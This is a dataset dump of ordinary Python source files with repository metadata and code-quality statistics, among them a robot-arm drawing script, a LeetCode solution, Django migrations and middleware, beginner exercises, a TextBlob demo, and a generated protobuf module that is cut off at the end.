hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b63fae52a7308e09b772e87e913912fdafe1537a | 1,546 | py | Python | tests/smiley.py | zoso95/xArm | 7598a0df976770179b7b5229cedd2ec46db92ef9 | [
"MIT"
] | null | null | null | tests/smiley.py | zoso95/xArm | 7598a0df976770179b7b5229cedd2ec46db92ef9 | [
"MIT"
] | null | null | null | tests/smiley.py | zoso95/xArm | 7598a0df976770179b7b5229cedd2ec46db92ef9 | [
"MIT"
] | null | null | null | from xarm.arm import *
import math
import time
grip_close()
def reset():
movej((500, 500, 500, 500, 500), 2000)
power_off()
#jDepart = (497, 426, 738, 55, 500)
jDepart = (497, 426, 700, 55, 500)
movej(jDepart, 2000)
eye_x = 10
z_up = 0
z_down = -18
#(495, 420, 700, 64, 502)
servo_coord = get_position(False)
#(135, -3, -21)
center_origin = get_position(True)
print(servo_coord)
print(center_origin)
# y(+), x(inv), up(+)
#movel(appro(pA, (30, 0, 0)), 1000)
movel(appro(center_origin, (50, eye_x, z_up)), 1000)
movel(appro(center_origin, (50, eye_x, z_down)), 100)
movel(appro(center_origin, (30, eye_x, z_down)), 3000)
movel(appro(center_origin, (30, eye_x, z_up)), 100)
movel(appro(center_origin, (50, -eye_x, z_up)), 1000)
movel(appro(center_origin, (50, -eye_x, z_down)), 100)
movel(appro(center_origin, (30, -eye_x, z_down)), 3000)
movel(appro(center_origin, (30, -eye_x, z_up)), 100)
cx, cy = 0, 30
r = 30
for theta in range(0, -180, -15):
angle = (theta/360)*2*math.pi
x,y = cx+r*math.cos(angle), cy+r*math.sin(angle)
movel(appro(center_origin, (y, x, z_down)), 1000)
reset()
"""
x_start = 40
movel(appro(center_origin, (50, -x_start, 5)), 1000)
movel(appro(center_origin, (50, -x_start, 0)), 100)
"""
"""
pA = get_position(True)
movel(appro(pA, (30, 0, 5)), 1000)
grip_close(850)
pAppr = appro(pA, (30, 0, 25))
movel(pAppr, 1000)
movel(appro(pA, (30, 0, 5)), 1000)
grip_open()
time.sleep(2)
movej((500, 500, 500, 500, 500), 2000)
power_off()
"""
#import code
#code.interact(local=locals())
| 18.404762 | 55 | 0.649418 | 272 | 1,546 | 3.522059 | 0.301471 | 0.146138 | 0.183716 | 0.25261 | 0.5 | 0.484342 | 0.480167 | 0.417537 | 0.367432 | 0.296451 | 0 | 0.160061 | 0.151358 | 1,546 | 83 | 56 | 18.626506 | 0.570122 | 0.107374 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032258 | false | 0 | 0.096774 | 0 | 0.129032 | 0.064516 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b64585c1a28a04264c03e9c032860767ded10d91 | 1,668 | py | Python | src/143-ReorderList.py | Jiezhi/myleetcode | b346e94c46da2a3033ebc8ff50e621aa179c4f62 | [
"MIT"
] | 1 | 2022-03-03T15:11:48.000Z | 2022-03-03T15:11:48.000Z | src/143-ReorderList.py | Jiezhi/myleetcode | b346e94c46da2a3033ebc8ff50e621aa179c4f62 | [
"MIT"
] | null | null | null | src/143-ReorderList.py | Jiezhi/myleetcode | b346e94c46da2a3033ebc8ff50e621aa179c4f62 | [
"MIT"
] | 2 | 2022-01-20T22:49:58.000Z | 2022-01-20T22:53:13.000Z | #!/usr/bin/env python
"""
CREATED AT: 2021/12/22
Des:
GITHUB: https://github.com/Jiezhi/myleetcode
Difficulty: Medium
Tag:
See:
Time Spent: 20 min
"""
from typing import Optional
from src.list_node import ListNode, buildListNode
class Solution:
def reorderList(self, head: Optional[ListNode]) -> None:
"""
Runtime: 96 ms, faster than 53.19%
Memory Usage: 23.2 MB, less than 94.94%
Do not return anything, modify head in-place instead.
The number of nodes in the list is in the range [1, 5 * 10^4].
1 <= Node.val <= 1000
"""
nums = []
node = head
while node:
nums.append(node.val)
node = node.next
node = head.next
index = 1
flag = 1
while index <= len(nums) / 2 and node:
flag *= -1
node.val = nums[index * flag]
node = node.next
if flag == 1:
index += 1
def test():
test_case = buildListNode([1])
Solution().reorderList(test_case)
assert test_case == buildListNode([1])
test_case = buildListNode([1, 2])
Solution().reorderList(test_case)
assert test_case == buildListNode([1, 2])
test_case = buildListNode([1, 2, 3])
Solution().reorderList(test_case)
assert test_case == buildListNode([1, 3, 2])
test_case = buildListNode([1, 2, 3, 4])
Solution().reorderList(test_case)
assert test_case == buildListNode([1, 4, 2, 3])
test_case = buildListNode([1, 2, 3, 4, 5])
Solution().reorderList(test_case)
assert test_case == buildListNode([1, 5, 2, 4, 3])
if __name__ == '__main__':
test()
| 23.492958 | 70 | 0.585132 | 220 | 1,668 | 4.327273 | 0.4 | 0.12605 | 0.220588 | 0.231092 | 0.392857 | 0.368697 | 0.368697 | 0.288866 | 0.288866 | 0 | 0 | 0.058032 | 0.28717 | 1,668 | 70 | 71 | 23.828571 | 0.742641 | 0.217626 | 0 | 0.194444 | 0 | 0 | 0.006441 | 0 | 0 | 0 | 0 | 0 | 0.138889 | 1 | 0.055556 | false | 0 | 0.055556 | 0 | 0.138889 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b6510e75092a2e29d25ef15017430fac746a4e41 | 364 | py | Python | src/django_plpy/migrations/0001_initial.py | swqqn/plpy | 696d522e49c848aa310dc9f71f6d8b07ca6730bb | [
"MIT"
] | 37 | 2022-01-15T11:12:13.000Z | 2022-03-31T01:40:46.000Z | src/django_plpy/migrations/0001_initial.py | swqqn/plpy | 696d522e49c848aa310dc9f71f6d8b07ca6730bb | [
"MIT"
] | 2 | 2022-03-11T14:01:18.000Z | 2022-03-27T08:13:20.000Z | src/django_plpy/migrations/0001_initial.py | swqqn/plpy | 696d522e49c848aa310dc9f71f6d8b07ca6730bb | [
"MIT"
] | 1 | 2022-03-04T16:13:35.000Z | 2022-03-04T16:13:35.000Z | # Generated by Django 3.2.2 on 2021-05-07 11:18
from django.contrib.postgres.operations import CreateExtension
from django.db import migrations
class PythonExtension(CreateExtension):
def __init__(self):
self.name = 'plpython3u'
class Migration(migrations.Migration):
dependencies = [
]
operations = [
PythonExtension()
]
| 19.157895 | 62 | 0.703297 | 40 | 364 | 6.3 | 0.7 | 0.079365 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.055556 | 0.208791 | 364 | 18 | 63 | 20.222222 | 0.819444 | 0.123626 | 0 | 0 | 1 | 0 | 0.031546 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.181818 | 0 | 0.636364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
b6548f4cd5309fbed9cfc02f8f9f385c9bdb39fa | 466 | py | Python | exercises/Desafio032.py | zThiago15/Curso-em-Video | ef25e0497edb79bdfbe71fde485f4dafc0d2a0e6 | [
"MIT"
] | null | null | null | exercises/Desafio032.py | zThiago15/Curso-em-Video | ef25e0497edb79bdfbe71fde485f4dafc0d2a0e6 | [
"MIT"
] | null | null | null | exercises/Desafio032.py | zThiago15/Curso-em-Video | ef25e0497edb79bdfbe71fde485f4dafc0d2a0e6 | [
"MIT"
] | 1 | 2021-07-24T21:39:26.000Z | 2021-07-24T21:39:26.000Z | from datetime import date
ano = int(input('\033[30mQual ano você quer analisar? Coloque 0 para analisar o ano atual: '))
if ano == 0:
ano = date.today().year #Ele irá analisar o ano atual e dizer se ele é bissexto ou não.
if ano % 4 == 0 and ano % 100 != 0 or ano % 400 == 0:
print(f'\033[1;30mO ano \033[1;34m{ano} \033[30mÉ BISSEXTO.')
else:
print(f'\033[31mO ano \033[1;34m{ano} \033[31mNÃO é BISSEXTO.')
print('\033[34m='*15,'Fim do PROGRAMA','='*15) | 51.777778 | 94 | 0.654506 | 88 | 466 | 3.465909 | 0.534091 | 0.078689 | 0.078689 | 0.111475 | 0.104918 | 0.104918 | 0 | 0 | 0 | 0 | 0 | 0.15445 | 0.180258 | 466 | 9 | 95 | 51.777778 | 0.643979 | 0.133047 | 0 | 0 | 0 | 0.222222 | 0.502475 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b654a4d176593e4826553450974b3f6ea99a5d7c | 581 | py | Python | capitulo-03/ex11.py | bryan-lima/exercicios-livro-introd-prog-python-3ed | b6bc26dced9728510865704a80cb0d97f81f756b | [
"MIT"
] | 3 | 2021-11-09T17:54:10.000Z | 2022-01-30T22:32:25.000Z | capitulo-03/ex11.py | bryan-lima/exercicios-livro-introd-prog-python-3ed | b6bc26dced9728510865704a80cb0d97f81f756b | [
"MIT"
] | null | null | null | capitulo-03/ex11.py | bryan-lima/exercicios-livro-introd-prog-python-3ed | b6bc26dced9728510865704a80cb0d97f81f756b | [
"MIT"
] | null | null | null | # Faça um programa que solicite o preço de uma mercadoria e o percentual de desconto
# Exiba o valor do desconto e o preço a pagar
currentPrice = float(input('\nInforme o preço do produto: R$ '))
discountPercentage = float(input('Digite o percentual de desconto: '))
discount = currentPrice * discountPercentage / 100
newPrice = currentPrice - discount
print(f'\nO valor atual do produto é de R$ {currentPrice:.2f}')
print(f'Um desconto de {discountPercentage}%, representa um desconto de R$ {discount:.2f}')
print(f'Com o desconto, o produto passa a custar R$ {newPrice:.2f}')
| 44.692308 | 91 | 0.748709 | 87 | 581 | 5 | 0.448276 | 0.041379 | 0.05977 | 0.096552 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01217 | 0.151463 | 581 | 12 | 92 | 48.416667 | 0.870183 | 0.216867 | 0 | 0 | 0 | 0 | 0.570796 | 0.048673 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.142857 | 0 | 0 | 0 | 0.428571 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 2 |
b65c9d3369799dc5b04300093745ef74508db7dd | 574 | py | Python | djconfig/middleware.py | nicolasdet/projet_django | 85731e8594597dc3968910be2f37b950675ca809 | [
"PSF-2.0",
"BSD-3-Clause"
] | 23 | 2015-01-30T11:57:44.000Z | 2021-07-31T14:24:52.000Z | djconfig/middleware.py | nicolasdet/projet_django | 85731e8594597dc3968910be2f37b950675ca809 | [
"PSF-2.0",
"BSD-3-Clause"
] | 24 | 2015-04-19T12:47:50.000Z | 2020-09-12T19:16:18.000Z | djconfig/middleware.py | nicolasdet/projet_django | 85731e8594597dc3968910be2f37b950675ca809 | [
"PSF-2.0",
"BSD-3-Clause"
] | 3 | 2015-04-13T13:50:52.000Z | 2020-09-12T11:12:27.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from . import conf
try:
from django.utils.deprecation import MiddlewareMixin
except ImportError: # Django < 1.10
MiddlewareMixin = object
__all__ = ['DjConfigMiddleware']
class DjConfigMiddleware(MiddlewareMixin):
"""
Populate the cache using the database.\
Reload the cache *only* if it is not up\
to date with the config model
"""
def process_request(self, request):
conf.reload_maybe()
# Backward compatibility
DjConfigLocMemMiddleware = DjConfigMiddleware
| 20.5 | 56 | 0.719512 | 63 | 574 | 6.380952 | 0.746032 | 0.039801 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008715 | 0.200348 | 574 | 27 | 57 | 21.259259 | 0.867102 | 0.303136 | 0 | 0 | 0 | 0 | 0.047619 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.363636 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
b66e2c46936a67fcb0715e7e6a911a1206882745 | 1,083 | py | Python | setup.py | matthewoliver/psql2mysql | 3353d9eee474479b5b514d558fdbafaab18f6a3d | [
"Apache-2.0"
] | null | null | null | setup.py | matthewoliver/psql2mysql | 3353d9eee474479b5b514d558fdbafaab18f6a3d | [
"Apache-2.0"
] | null | null | null | setup.py | matthewoliver/psql2mysql | 3353d9eee474479b5b514d558fdbafaab18f6a3d | [
"Apache-2.0"
] | null | null | null | from setuptools import setup, find_packages
setup(
name='psql2mysql',
version='0.4.0',
description='Copy data from PostgreSQL databases to MySQL',
url='https://github.com/SUSE/psql2mysql',
author='SUSE LLC',
author_email='things@suse.com',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache License 2.0',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
packages=find_packages(exclude=['tests']),
install_requires=[
'oslo.config',
'oslo.log',
'psycopg2',
'prettytable',
'PyMySQL',
'rfc3986',
'SQLAlchemy<1.1.0,>=1.0.10',
],
tests_require=[
'flake8',
'mock',
],
entry_points={
'console_scripts': [
'psql2mysql=psql2mysql:main',
],
},
)
| 27.075 | 63 | 0.55494 | 106 | 1,083 | 5.603774 | 0.641509 | 0.159933 | 0.210438 | 0.131313 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.040365 | 0.290859 | 1,083 | 39 | 64 | 27.769231 | 0.733073 | 0 | 0 | 0.105263 | 0 | 0 | 0.495845 | 0.047091 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.026316 | 0 | 0.026316 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b68a9da01734c4c91ad691365393e1ed523c74a8 | 1,018 | py | Python | source_code/NLP_words_and_sentences.py | diogenisAl/pyNLP | 14fc5b13b6755397e628c5f2f8de9d9ee6adbffe | [
"MIT"
] | null | null | null | source_code/NLP_words_and_sentences.py | diogenisAl/pyNLP | 14fc5b13b6755397e628c5f2f8de9d9ee6adbffe | [
"MIT"
] | null | null | null | source_code/NLP_words_and_sentences.py | diogenisAl/pyNLP | 14fc5b13b6755397e628c5f2f8de9d9ee6adbffe | [
"MIT"
] | null | null | null | # Import the TextBlob class from the textblob library
from textblob import TextBlob
# Set a text to analyze
text = "Today is a beautiful day. Tomorrow looks like bad weather. is a"
# Create a blob object using the TextBlob class, with the text variable as a parameter
blob = TextBlob(text)
# We can see the sentences in the text by printing blob.sentences
# blob.sentences is a list, and every element is one sentence of the text
print("Sentences in the text:")
print(blob.sentences)
# We can see the words in the text by printing blob.words
# blob.words is a list, and every element is one word of the text
print("\nWords in the text:")
print(blob.words)
# TODO:
# 1. Print all the UNIQUE words in the text
all_items = blob.words
unique_items = []
for x in all_items:
if x not in unique_items:
unique_items.append(x)
print("\nUnique words in the text:")
print(unique_items)
# 2. Print the number of unique words in the text
print("\nThe number of unique words in the text:")
print(len(unique_items)) | 31.8125 | 86 | 0.746562 | 179 | 1,018 | 4.206704 | 0.340782 | 0.102258 | 0.095618 | 0.092961 | 0.320053 | 0.220452 | 0.159363 | 0.159363 | 0 | 0 | 0 | 0.002401 | 0.181729 | 1,018 | 32 | 87 | 31.8125 | 0.901561 | 0.500982 | 0 | 0 | 0 | 0 | 0.34739 | 0 | 0 | 0 | 0 | 0.03125 | 0 | 1 | 0 | false | 0 | 0.0625 | 0 | 0.0625 | 0.5 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
b68ae00e50396bec4da5de82f4e22865fe83b0ae | 871 | py | Python | src/navi/components/other/low_pass_filter.py | project-capo/app-drive-and-visualize | 05305c3bdc23769e259cdb82b3a4fac5bb177d39 | [
"Unlicense"
] | null | null | null | src/navi/components/other/low_pass_filter.py | project-capo/app-drive-and-visualize | 05305c3bdc23769e259cdb82b3a4fac5bb177d39 | [
"Unlicense"
] | null | null | null | src/navi/components/other/low_pass_filter.py | project-capo/app-drive-and-visualize | 05305c3bdc23769e259cdb82b3a4fac5bb177d39 | [
"Unlicense"
] | null | null | null | from navi.components.component import Component
__author__ = 'paoolo'
class LowPassFilter(Component):
"""
Used to low pass.
"""
def __init__(self):
super(LowPassFilter, self).__init__(enable=True)
self._old_left = 0.0
self._old_right = 0.0
self._alpha = 0.3
def modify(self, left, right):
left = self._low_pass_filter(left, self._old_left)
right = self._low_pass_filter(right, self._old_right)
self._old_left, self._old_right = left, right
return left, right
def _low_pass_filter(self, new_value, old_value):
if old_value is None:
return new_value
return old_value + self._alpha * (new_value - old_value)
@property
def alpha(self):
return self._alpha
@alpha.setter
def alpha(self, val):
self._alpha = float(val) | 22.921053 | 64 | 0.631458 | 115 | 871 | 4.4 | 0.321739 | 0.083004 | 0.065217 | 0.067194 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009464 | 0.272101 | 871 | 38 | 65 | 22.921053 | 0.788644 | 0.019518 | 0 | 0 | 0 | 0 | 0.007151 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.217391 | false | 0.217391 | 0.043478 | 0.043478 | 0.478261 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
b6b72d4482f07a1269f3296d2e1827d78e450620 | 19,711 | py | Python | arista/tag/v1/tag_pb2.py | barryCrunch/cloudvision-python | bafb55a57743141ef419ce8b6f3adda31a18ca42 | [
"Apache-2.0"
] | 8 | 2020-10-22T13:19:00.000Z | 2021-12-16T02:16:47.000Z | arista/tag/v1/tag_pb2.py | barryCrunch/cloudvision-python | bafb55a57743141ef419ce8b6f3adda31a18ca42 | [
"Apache-2.0"
] | 6 | 2020-12-16T11:31:03.000Z | 2021-11-19T10:00:37.000Z | arista/tag/v1/tag_pb2.py | barryCrunch/cloudvision-python | bafb55a57743141ef419ce8b6f3adda31a18ca42 | [
"Apache-2.0"
] | 7 | 2020-12-04T01:30:34.000Z | 2021-11-11T21:40:12.000Z | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: arista/tag.v1/tag.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import wrappers_pb2 as google_dot_protobuf_dot_wrappers__pb2
from fmp import extensions_pb2 as fmp_dot_extensions__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='arista/tag.v1/tag.proto',
package='arista.tag.v1',
syntax='proto3',
serialized_options=_b('Z\"arista/resources/arista/tag.v1;tag'),
serialized_pb=_b('\n\x17\x61rista/tag.v1/tag.proto\x12\rarista.tag.v1\x1a\x1egoogle/protobuf/wrappers.proto\x1a\x14\x66mp/extensions.proto\"h\n\x06TagKey\x12+\n\x05label\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12+\n\x05value\x18\x02 \x01(\x0b\x32\x1c.google.protobuf.StringValue:\x04\x80\x8e\x19\x01\"@\n\x12InterfaceTagConfig\x12\"\n\x03key\x18\x01 \x01(\x0b\x32\x15.arista.tag.v1.TagKey:\x06\xfa\x8d\x19\x02rw\"l\n\x0cInterfaceTag\x12\"\n\x03key\x18\x01 \x01(\x0b\x32\x15.arista.tag.v1.TagKey\x12\x30\n\x0c\x63reator_type\x18\x02 \x01(\x0e\x32\x1a.arista.tag.v1.CreatorType:\x06\xfa\x8d\x19\x02ro\"\xe0\x01\n\x19InterfaceTagAssignmentKey\x12+\n\x05label\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12+\n\x05value\x18\x02 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12/\n\tdevice_id\x18\x03 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12\x32\n\x0cinterface_id\x18\x04 \x01(\x0b\x32\x1c.google.protobuf.StringValue:\x04\x80\x8e\x19\x01\"]\n\x1cInterfaceTagAssignmentConfig\x12\x35\n\x03key\x18\x01 \x01(\x0b\x32(.arista.tag.v1.InterfaceTagAssignmentKey:\x06\xfa\x8d\x19\x02rw\"=\n\x0f\x44\x65viceTagConfig\x12\"\n\x03key\x18\x01 \x01(\x0b\x32\x15.arista.tag.v1.TagKey:\x06\xfa\x8d\x19\x02rw\"i\n\tDeviceTag\x12\"\n\x03key\x18\x01 \x01(\x0b\x32\x15.arista.tag.v1.TagKey\x12\x30\n\x0c\x63reator_type\x18\x02 \x01(\x0e\x32\x1a.arista.tag.v1.CreatorType:\x06\xfa\x8d\x19\x02ro\"\xa9\x01\n\x16\x44\x65viceTagAssignmentKey\x12+\n\x05label\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12+\n\x05value\x18\x02 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12/\n\tdevice_id\x18\x03 \x01(\x0b\x32\x1c.google.protobuf.StringValue:\x04\x80\x8e\x19\x01\"W\n\x19\x44\x65viceTagAssignmentConfig\x12\x32\n\x03key\x18\x01 \x01(\x0b\x32%.arista.tag.v1.DeviceTagAssignmentKey:\x06\xfa\x8d\x19\x02rw*[\n\x0b\x43reatorType\x12\x1c\n\x18\x43REATOR_TYPE_UNSPECIFIED\x10\x00\x12\x17\n\x13\x43REATOR_TYPE_SYSTEM\x10\x01\x12\x15\n\x11\x43REATOR_TYPE_USER\x10\x02\x42$Z\"arista/resources/arista/tag.v1;tagb\x06proto3')
,
dependencies=[google_dot_protobuf_dot_wrappers__pb2.DESCRIPTOR,fmp_dot_extensions__pb2.DESCRIPTOR,])
_CREATORTYPE = _descriptor.EnumDescriptor(
name='CreatorType',
full_name='arista.tag.v1.CreatorType',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='CREATOR_TYPE_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CREATOR_TYPE_SYSTEM', index=1, number=1,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CREATOR_TYPE_USER', index=2, number=2,
serialized_options=None,
type=None),
],
containing_type=None,
serialized_options=None,
serialized_start=1131,
serialized_end=1222,
)
_sym_db.RegisterEnumDescriptor(_CREATORTYPE)
CreatorType = enum_type_wrapper.EnumTypeWrapper(_CREATORTYPE)
CREATOR_TYPE_UNSPECIFIED = 0
CREATOR_TYPE_SYSTEM = 1
CREATOR_TYPE_USER = 2
_TAGKEY = _descriptor.Descriptor(
name='TagKey',
full_name='arista.tag.v1.TagKey',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='label', full_name='arista.tag.v1.TagKey.label', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
